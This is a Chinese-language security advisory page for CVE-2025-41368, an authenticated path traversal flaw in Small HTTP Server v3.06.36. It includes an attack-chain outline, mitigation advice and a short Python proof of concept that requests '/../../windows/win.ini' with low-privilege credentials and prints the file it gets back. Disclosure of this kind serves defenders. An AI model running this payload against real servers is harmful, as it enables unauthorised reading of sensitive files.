IPBUF安全漏洞报告
English
CVE-2025-41368 CVSS 8.1 高危

CVE-2025-41368 Small HTTP Server路径遍历漏洞

披露日期: 2026-03-26
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-41368
漏洞类型
路径遍历
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Small HTTP Server

相关标签

路径遍历Small HTTP Server认证绕过信息泄露CVE-2025-41368

漏洞概述

Small HTTP Server v3.06.36版本中存在一个经过身份验证的路径遍历漏洞。该漏洞位于根路径'/'的处理逻辑中,允许远程攻击者利用特制请求绕过SecurityManager的安全限制。如果攻击者拥有相应的低权限账户,即可读取服务器文档根目录之外的任意文件,导致敏感信息泄露。

技术细节

该漏洞源于Small HTTP Server在处理Web请求时,对路径验证机制的实现存在缺陷。具体而言,当攻击者向根路径'/'发送包含路径遍历序列(如'../')的请求时,服务器未能正确过滤或规范化路径。尽管漏洞利用需要低权限账户认证(PR:L),但一旦通过认证,攻击者即可利用此缺陷突破SecurityManager设定的文档根目录边界。这导致攻击者能够未经授权地访问操作系统上的其他文件,造成高机密性影响(C:H)和高完整性影响(I:H)。攻击向量为网络(AV:N),无需用户交互(UI:N)。

攻击链分析

STEP 1
侦察阶段
攻击者扫描网络以识别运行Small HTTP Server v3.06.36的目标,并确定开放的服务端口。
STEP 2
获取凭证
由于漏洞需要认证(PR:L),攻击者通过暴力破解、钓鱼或利用默认凭据获取一个低权限账户。
STEP 3
漏洞利用
攻击者使用获取的低权限账户,向服务器根路径'/'发送包含路径遍历字符(如'../')的恶意HTTP请求。
STEP 4
数据窃取
服务器响应请求,返回文档根目录之外的敏感文件(如配置文件、源代码等),攻击者成功获取数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://<target_ip>/" # Vulnerable payload using path traversal to read win.ini # The vulnerability exists in the root '/' handler payload = "/../../windows/win.ini" # Credentials (Low privilege required as per CVE description) username = "<user>" password = "<password>" try: # Send request with authentication response = requests.get(target_url + payload, auth=(username, password), timeout=10) if response.status_code == 200 and "[extensions]" in response.text: print("[+] Exploit successful! Vulnerability confirmed.") print("[+] File content:") print(response.text) else: print("[-] Exploit failed. Check credentials or target version.") print(f"Status Code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Small HTTP Server v3.06.36

防御指南

临时缓解措施
如果无法立即升级,建议在防火墙或WAF中部署规则,拦截包含典型路径遍历字符(如'../'、'%2e%2e/')的HTTP请求。同时,应禁用不必要的服务账户,并确保服务器仅监听受信任的内部接口,减少攻击面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表